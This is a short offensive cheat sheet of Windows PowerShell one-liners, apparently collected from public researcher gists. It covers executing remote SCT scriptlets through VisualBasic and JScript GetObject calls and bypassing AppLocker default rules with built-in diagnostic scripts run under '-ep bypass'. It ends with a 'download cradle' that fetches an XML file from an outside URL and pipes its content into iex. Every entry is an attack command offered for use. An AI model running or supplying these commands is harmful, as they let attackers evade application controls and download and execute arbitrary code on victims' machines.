### SCT VBScript/JScript Execution
### [

[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0)

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())


### Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts

powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ..\..\..\..\path\assembly.exe
[name.space]::executesomething()

### Command Invocation w/ PowerShell Diagnostic Scripts

powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module CL_Invocation.ps1
SyncInvoke notepad.exe

### PowerShell v5+ Download Cradle
### [@subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d]
### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239]

$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex